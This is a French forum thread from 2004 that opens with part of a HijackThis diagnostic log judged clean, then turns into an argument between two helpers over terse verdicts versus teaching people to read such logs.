O9 - Extra button: Wanadoo - {1462651F-F4BA-4C76-A001-C4284D0FE16E} - http://www.wanadoo.fr (file missing) (HKCU)
O16 - DPF: fdjeux - https://www.fdjeux.net/classes/fdjeux.cab
O16 - DPF: teleir_cert - https://static.ir.dgi.minefi.gouv.f [...] r_cert.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{DA621077-9973-4250-BBE7-0958E44BD96F}: NameServer = 80.10.246.134 80.10.246.7
 
D'avance Merci Acrobaze....

Reply

Marsh Posté le 08-10-2004 à 22:13:52    


RAS! C'est bon! :hello:

Reply

Marsh Posté le 09-10-2004 à 11:34:59    

Acrobaze a écrit :

RAS! C'est bon! :hello:


 
 :) Merci Acrobaze!!
 
Mais... si je peux me permettre, quelles bases as tu pour l'analyse de ces rapports ?
 

Reply

Marsh Posté le 09-10-2004 à 11:40:27    

Sa connaissance ultime et universelle de tout ce qui touche de près ou de loin à la sécurité, aux spywares. En fait Acrobaze est celui qui a inventé l'analyse de logs, c'est un bot intelligent qui répond toujours juste :sarcastic: !
 
Acrobaze, voilà un exemple flagrant de quelqu'un qui veut apprendre et à qui tu n'as apporté qu'une petite réponse de court terme. Ton manquement est évident !
 
Pasan > regarde dans ma signature ;)


---------------
Got spyware ? | HFR HijackThis Tutorial
Reply

Marsh Posté le 09-10-2004 à 12:30:34    

Pasan a écrit :

:) Merci Acrobaze!!
 
Mais... si je peux me permettre, quelles bases as tu pour l'analyse de ces rapports ?


 
Salut!
Je crois d'abord que la base indispensable, c'est l'expérience.
HijackThis est une question à laquelle je me suis intéressé il y a maintenant un bon moment. Et à force, on arrive à cerner les pb, à savoir exactement ce que l'on doit y chercher et y trouver et surtout à dégager des procédures pour résoudre les pb.
 
A+!  :hello:

Reply

Marsh Posté le 09-10-2004 à 12:35:16    

sanpellegrino a écrit :

Sa connaissance ultime et universelle de tout ce qui touche de près ou de loin à la sécurité, aux spywares. En fait Acrobaze est celui qui a inventé l'analyse de logs, c'est un bot intelligent qui répond toujours juste :sarcastic: !
 
Acrobaze, voilà un exemple flagrant de quelqu'un qui veut apprendre et à qui tu n'as apporté qu'une petite réponse de court terme. Ton manquement est évident !
 
Pasan > regarde dans ma signature ;)


 
Je ne comprends pas bien le sens de tes interventions.
 
Tu pensais que Pasan aurait une illumination lui révélant l'utilisation  simultanée de CoolWebSchredder et Ad-Aware le tout en mode sans échec? Et ce, grâce aux liens de ta signature?

Reply

Marsh Posté le 09-10-2004 à 12:42:43    

Acrobaze a écrit :

Salut!
Je crois d'abord que la base indispensable, c'est l'expérience.


Mais comment veux-tu en acquérir si on est face à des types comme toi qui n'expliquent jamais rien !

Acrobaze a écrit :


HijackThis est une question à laquelle je me suis intéressé il y a maintenant un bon moment. Et à force, on arrive à cerner les pb, à savoir exactement ce que l'on doit y chercher et y trouver et surtout à dégager des procédures pour résoudre les pb.


:fou: et tu as tout appris par toi-même, grand manitou ? On te demande tes sources !
 
Pourquoi tu ne fais partager ton expérience que par des petites résolutions comme celle-ci ? Tu as peur que quelqu'un s'y connaisse aussi ? Quel insupportable égoïsme !
 
C'est exactement ce que je me tue à te dire: c'est pour des types comme Pasan que j'ai écrit ce tutoriel ! Tandis que toi tu ne veux rien expliquer, tu fais juste le bot qui répond !
 
Et le pire c'est que tu as l'air de t'en foutre [:wam].
 
Et une fois de plus à court d'arguments tu choisiras le silence ? Ca ne m'étonnerait pas...


Message édité par sanpellegrino le 09-10-2004 à 13:00:09

---------------
Got spyware ? | HFR HijackThis Tutorial
Reply

Marsh Posté le 09-10-2004 à 13:14:50    


Ca devient très très ennuyeux, ce genre d'intervention.
 
Si aider quelqu'un d'une façon responsable, c'est dire:
-Va copier/coller ton scan dans l'analyseur automatique
-Recherche sur Google les fichiers signalés.
Ben non, c'est certain que nous ne sommes pas d'accord.
 
Quant à mes sources, désolé. Je n'ai pas compilé les centaines de rapports analysés.  
 
Maintenant, je te demanderais d'arrêter tes interventions hargneuses.

Reply

Marsh Posté le 09-10-2004 à 15:30:29    

Sanpellegrino, excuse moi, mais je ne comprend vraiment pas ton intervention????
Elle me ferait presque passer pour un.... Abr..., Non, non calmons nous.
J'ai sincérement l'impression que l'on a en la personne de Acrobaze quelqu'un de sympa, compétent, efficace....
Pourquoi tant de haine?

Reply

Marsh Posté le 09-10-2004 à 21:15:32    

.....Toutefois, pour rester honnête, Bravo a toi aussi Sanpellegrino pour la qualité de ton tutoriel sur Hijack This.
 
La tolerance, la tolérance!!!

Reply

Marsh Posté le 10-10-2004 à 00:01:38    

Pasan, bien sûr que non je ne te prends pas pour un abruti ;). Plutôt comme un témoin dans ce cas précis, je m'explique:  
 
Que préfères-tu ? Que quelqu'un te fasse la hotline à chaque fois que tu as un problème ? Ou bien qu'on t'explique et t'apprenne comment résoudre seul, éviter et prévenir ton problème ?  
 
Acrobaze choisit le 1, moi le 2. Je ne comprends vraiment pas qu'on puisse répondre au cas par cas systématiquement. Tout ça sans justification aucune, aucune coopération ou collaboration, en un mot sans aucun partage. Mais je m'arrête, je parle à un mur, qui de toute façon n'est pas prêt à se remettre en question une seconde.
 
Content que mon tuto t'ait servi (vu le nombre de vues tu n'es pas le premier, c'est tout bon), n'hésite pas à revenir poser des question quand tu veux :hello:


---------------
Got spyware ? | HFR HijackThis Tutorial
Reply

Marsh Posté le 10-10-2004 à 20:33:06    

Pour conclure ce débat....
 
Merci à tous les deux qui m'avez dépanné, je dirais de façons complémentaires..... ;-)

Reply

Marsh Posté le    

Reply

Sujets relatifs:

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed